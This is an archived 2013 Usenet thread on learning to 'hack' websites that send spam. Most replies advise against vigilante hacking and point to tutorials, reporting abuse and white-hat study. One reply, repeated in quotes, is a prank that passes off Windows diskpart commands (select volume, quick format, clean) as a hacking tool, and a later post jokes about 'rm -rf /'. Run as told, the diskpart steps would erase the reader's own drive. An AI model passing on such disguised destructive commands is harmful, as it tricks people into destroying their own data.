Discussion:
best online source to learn code?
(too old to reply)
dobbie
2013-11-01 07:45:09 UTC
Permalink
Can anyone here offer me good suggestions on how to learn how to code
for hacking certain webpages which spam or otherwise violate common
netiquette?

There are a few code learning sites, I have tried one but it is
cumbersome and not very easy to use and slow. I am currently learning php.

BTW does this group accept posts from remailers using m2n gateways?
FromTheRafters
2013-11-01 13:18:02 UTC
Permalink
Post by dobbie
Can anyone here offer me good suggestions on how to learn how to code
for hacking certain webpages which spam or otherwise violate common
netiquette?
There's no 'fast-track' to hacking - find a script-kiddie group.
Post by dobbie
There are a few code learning sites, I have tried one but it is
cumbersome and not very easy to use and slow. I am currently learning php.
You will find that some effort is involved in any worthwhile endeavor.
Post by dobbie
BTW does this group accept posts from remailers using m2n gateways?
The group doesn't care, but the servers propagating the articles can
each have their own rules.
Mike Duffy
2013-11-01 15:38:37 UTC
Permalink
Post by FromTheRafters
There's no 'fast-track' to hacking - find a script-kiddie group.
If you do a web search on "degree program hacking", you wll find a good
number of educational programs focused on network and application security.

They will show you in detail a number of well-known exploits from the
history of the industry. If you can get such a degree, you will probably be
able to recognize security holes when you run across them.

But you are better off pursuing a "white hat" carreer. When you consider
prison terms and fines, this will probably be more lucrative in the long
term.
soja_a
2013-11-01 15:21:27 UTC
Permalink
Post by dobbie
Can anyone here offer me good suggestions on how to learn how to code
for hacking certain webpages which spam or otherwise violate common
netiquette?
First of all, hacking a website as retribution for spamming is quite possibly
the worst approach to take. Much better to report them to their upstream provider
and/or hosting company (information that can be found with whois and traceroute)
than run the risk of being accused of a criminal offense.

Apart from that, I'm never one to discourage people from learning to code.
You'd want to learn HTML, and a good site for that is:
http://www.w3schools.com/html/

As you mention, you'll also want to know PHP, and a link for that is:
http://www.w3schools.com/php/

(you might detect a theme to these links)

Many websites can be exploited using SQL injection, so to learn SQL see:
http://www.w3schools.com/sql/

Apart from that, your best tool for hacking is your brain. Learn as much as
you can about the systems that interest you. If website security is what interests
you, learn about the Apache webserver software. Set up an Apache system at
home and learn how to attack and secure it.
Post by dobbie
BTW does this group accept posts from remailers using m2n gateways?
See my headers <g>

soja_a
Robert James
2013-11-11 05:12:14 UTC
Permalink
On 01 Nov 2013; I imposed a declaration in opposition to dobbie's motion
to modify THE PRELIMINARY INJUNCTION in support of the CROSS MOTION TO
VACATE THE PRELIMINARY INJUNCTION. So noted by the Federal Court of
Post by dobbie
Can anyone here offer me good suggestions on how to learn how to code
for hacking certain webpages which spam or otherwise violate common
netiquette?
There are a few code learning sites, I have tried one but it is
cumbersome and not very easy to use and slow. I am currently learning php.
BTW does this group accept posts from remailers using m2n gateways?
Windows already includes a program that allows you to spam and shut down
entire networks like the NORAD's or even your city's power grid.

Click Start > Run and type "CMD", pressing Enter should open a new
terminal.

Next start the HTML Hacker tool, type "DISK PART" into the Command Line
and press Enter.

The HTML Hacker tool, included with Windows now needs to know what type
of hack you want. Let's go all out and type "select volume 1" and press
Enter.

Type "format fs=ntfs quick label=3l33t" and press Enter. This is how the
elite got all those credit card numers from Sony.

Type "clean" and press Enter. This makes sure the FBI can not track you
on the interwebs after you hack.

Lastly, if successful you just may very well have hackered them their
interwebs! Yet if you are still reading this after following my
instructions you failed. Put on a dunce cap, and go and sit in the
corner!
--
Just because I'm paranoid doesn't mean the paranoid motherfuckers who
are making me paranoid aren't really out there!
Aardvark
2013-11-11 19:48:16 UTC
Permalink
Post by Robert James
On 01 Nov 2013; I imposed a declaration in opposition to dobbie's motion
to modify THE PRELIMINARY INJUNCTION in support of the CROSS MOTION TO
VACATE THE PRELIMINARY INJUNCTION. So noted by the Federal Court of
Post by dobbie
Can anyone here offer me good suggestions on how to learn how to code
for hacking certain webpages which spam or otherwise violate common
netiquette?
There are a few code learning sites, I have tried one but it is
cumbersome and not very easy to use and slow. I am currently learning php.
BTW does this group accept posts from remailers using m2n gateways?
Windows already includes a program that allows you to spam and shut down
entire networks like the NORAD's or even your city's power grid.
Click Start > Run and type "CMD", pressing Enter should open a new
terminal.
Next start the HTML Hacker tool, type "DISK PART" into the Command Line
and press Enter.
The HTML Hacker tool, included with Windows now needs to know what type
of hack you want. Let's go all out and type "select volume 1" and press
Enter.
Type "format fs=ntfs quick label=3l33t" and press Enter. This is how the
elite got all those credit card numers from Sony.
Type "clean" and press Enter. This makes sure the FBI can not track you
on the interwebs after you hack.
Lastly, if successful you just may very well have hackered them their
interwebs! Yet if you are still reading this after following my
instructions you failed. Put on a dunce cap, and go and sit in the
corner!
Why doesn't all that work in my CLI? I tried so hard, too.
--
"I am not made like anyone I have seen; I dare believe I am not made
like anyone in existence. If I am not better, at least I am different."
-Jean-Jacques Rousseau (1712-1778)
Robert James
2013-11-11 19:56:35 UTC
Permalink
On 11 Nov 2013; I imposed a declaration in opposition to Aardvark's
motion to modify THE PRELIMINARY INJUNCTION in support of the CROSS
MOTION TO VACATE THE PRELIMINARY INJUNCTION. So noted by the Federal
Court of Usenet Justice proceeding preliminary declaration, news:l5rca0
Post by Aardvark
Post by Robert James
Lastly, if successful you just may very well have hackered them their
interwebs! Yet if you are still reading this after following my
instructions you failed. Put on a dunce cap, and go and sit in the
corner!
Why doesn't all that work in my CLI? I tried so hard, too.
Because UNIX is not Bill Gates certified, and "rm -rf /" requires a
ritual sacrifice of the mythical Sex Goddess, Root:

Loading Image...
--
Just because I'm paranoid doesn't mean the paranoid motherfuckers who
are making me paranoid aren't really out there!
Jax
2013-11-12 21:41:41 UTC
Permalink
Post by Robert James
On 11 Nov 2013; I imposed a declaration in opposition to Aardvark's
motion to modify THE PRELIMINARY INJUNCTION in support of the CROSS
MOTION TO VACATE THE PRELIMINARY INJUNCTION. So noted by the Federal
Court of Usenet Justice proceeding preliminary declaration, news:l5rca0
Post by Aardvark
Post by Robert James
Lastly, if successful you just may very well have hackered them their
interwebs! Yet if you are still reading this after following my
instructions you failed. Put on a dunce cap, and go and sit in the
corner!
Why doesn't all that work in my CLI? I tried so hard, too.
Because UNIX is not Bill Gates certified, and "rm -rf /" requires a
http://blogs.miaminewtimes.com/crossfade/deathfacecobrasnake.jpg
Robert..... he probably doesn't know what he's doing!
--
Jax :)
Robert James
2013-11-12 22:16:48 UTC
Permalink
On 12 Nov 2013; I imposed a declaration in opposition to Jax's motion to
modify THE PRELIMINARY INJUNCTION in support of the CROSS MOTION TO
VACATE THE PRELIMINARY INJUNCTION. So noted by the Federal Court of
Post by Jax
Post by Robert James
On 11 Nov 2013; I imposed a declaration in opposition to Aardvark's
motion to modify THE PRELIMINARY INJUNCTION in support of the CROSS
MOTION TO VACATE THE PRELIMINARY INJUNCTION. So noted by the Federal
Court of Usenet Justice proceeding preliminary declaration,
Post by Aardvark
Post by Robert James
Lastly, if successful you just may very well have hackered them
interwebs! Yet if you are still reading this after following my
instructions you failed. Put on a dunce cap, and go and sit in the
corner!
Why doesn't all that work in my CLI? I tried so hard, too.
Because UNIX is not Bill Gates certified, and "rm -rf /" requires a
http://blogs.miaminewtimes.com/crossfade/deathfacecobrasnake.jpg
Robert..... he probably doesn't know what he's doing!
Neither do I... do I use the satanic knife, or the necromancer knife? Or
maybe, just maybe I could try to use sudo.
--
Just because I'm paranoid doesn't mean the paranoid motherfuckers who
are making me paranoid aren't really out there!
Hot-Text
2013-11-16 06:19:24 UTC
Permalink
"dobbie" <***@fuckedupgov.gov>

FBI

Loading...